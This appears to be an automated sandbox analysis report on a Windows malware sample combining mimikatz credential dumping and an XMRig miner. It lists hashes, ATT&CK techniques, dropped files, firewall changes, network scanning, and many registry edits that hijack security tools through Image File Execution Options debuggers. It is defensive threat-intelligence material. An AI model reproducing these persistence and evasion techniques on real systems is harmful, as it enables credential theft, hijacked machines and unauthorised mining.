mimikatz | b2d518916bbb9440d6c66a674ed1efb7cbf22569ed796d945b09c60fd3f22790

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
29-01-2025 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
Size

10.5MB
MD5

104bc394962c7a480e3411854ed43229
SHA1

e44cba3ff38bda1b7dea4015f45117b9a32d38df
SHA256

b2d518916bbb9440d6c66a674ed1efb7cbf22569ed796d945b09c60fd3f22790
SHA512

f4c62aeaa0f47c5a54faea889415fabc42a4fc14f6434925bc61c370578dc4daefe2289b0d64b603c828af202ac2f5436367b2969df93920149de67184b2aa18
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaar:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrB

Score

10^/10

mimikatz xmrig credential_access defense_evasion discovery execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2452 created 1760	2452	tbutbbj.exe	37

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (29984) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/1572-180-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-185-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-202-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-213-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-220-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-231-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-242-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-493-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-495-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-497-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-747-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig
behavioral2/memory/1572-748-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/3888-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/3888-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x0009000000023c56-6.dat	mimikatz
behavioral2/memory/1696-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/1292-137-0x00007FF7F7050000-0x00007FF7F713E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tbutbbj.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	tbutbbj.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4072	netsh.exe
576	netsh.exe

Executes dropped EXE 26 IoCs

pid	Process
1696	tbutbbj.exe
2452	tbutbbj.exe
3436	wpcap.exe
3160	eztkisrdr.exe
1292	vfshost.exe
3996	xohudmc.exe
560	ogmqci.exe
5076	ypdiqfiui.exe
1572	iakeqk.exe
2468	ypdiqfiui.exe
2712	tbutbbj.exe
3312	ypdiqfiui.exe
2004	ypdiqfiui.exe
2552	ypdiqfiui.exe
1504	ypdiqfiui.exe
1364	ypdiqfiui.exe
2020	ypdiqfiui.exe
4908	ypdiqfiui.exe
3960	ypdiqfiui.exe
1548	ypdiqfiui.exe
2576	ypdiqfiui.exe
3156	ypdiqfiui.exe
3760	ypdiqfiui.exe
1864	ypdiqfiui.exe
4964	tbutbbj.exe
456	qwttvniyq.exe

Loads dropped DLL 12 IoCs

pid	Process
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3436	wpcap.exe
3160	eztkisrdr.exe
3160	eztkisrdr.exe
3160	eztkisrdr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ifconfig.me
52	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	tbutbbj.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\ogmqci.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tbutbbj.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	tbutbbj.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\ogmqci.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	tbutbbj.exe

UPX packed file 34 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1292-135-0x00007FF7F7050000-0x00007FF7F713E000-memory.dmp	upx
behavioral2/files/0x0007000000023ca0-136.dat	upx
behavioral2/memory/1292-137-0x00007FF7F7050000-0x00007FF7F713E000-memory.dmp	upx
behavioral2/files/0x0007000000023cab-155.dat	upx
behavioral2/memory/5076-156-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/5076-159-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/files/0x0007000000023ca8-162.dat	upx
behavioral2/memory/1572-163-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/2468-173-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/3312-177-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-180-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/2004-183-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-185-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/2552-188-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1504-192-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1364-196-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/2020-200-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-202-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/4908-205-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/3960-209-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-213-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1548-214-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/2576-218-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-220-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/3156-223-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/3760-227-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1864-230-0x00007FF793E40000-0x00007FF793E9B000-memory.dmp	upx
behavioral2/memory/1572-231-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-242-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-493-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-495-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-497-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-747-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx
behavioral2/memory/1572-748-0x00007FF68A3C0000-0x00007FF68A4E0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\vieiitfbt\UnattendGC\specials\crli-0.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\ucl.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\AppCapture32.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\tibe-2.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\xdvl-0.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\vimpcsvc.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\mimilib.dll	tbutbbj.exe
File opened for modification	C:\Windows\vieiitfbt\Corporate\log.txt	cmd.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\Packet.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\trfo-2.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\zlib1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\scan.bat	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\libeay32.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\mimidrv.sys	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\posh-0.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\libxml2.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\ssleay32.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\upbdrjv\swrpwe.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\ip.txt	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\cnli-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\docmicfg.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\schoedcl.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\vimpcsvc.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\schoedcl.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\trch-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\spoolsrv.exe	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\tbutbbj.exe	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\coli-0.dll	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\spoolsrv.xml	tbutbbj.exe
File opened for modification	C:\Windows\vieiitfbt\tbntqyuzn\Packet.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\svschost.xml	tbutbbj.exe
File created	C:\Windows\bptuvtrj\schoedcl.xml	tbutbbj.exe
File created	C:\Windows\bptuvtrj\tbutbbj.exe	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\schoedcl.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\AppCapture64.dll	tbutbbj.exe
File opened for modification	C:\Windows\vieiitfbt\tbntqyuzn\Result.txt	qwttvniyq.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\tucl-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\svschost.exe	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\vfshost.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\Shellcode.ini	tbutbbj.exe
File created	C:\Windows\ime\tbutbbj.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\wpcap.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\schoedcl.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\bptuvtrj\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\qwttvniyq.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\exma-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\docmicfg.xml	tbutbbj.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2632	sc.exe
3784	sc.exe
220	sc.exe
4972	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
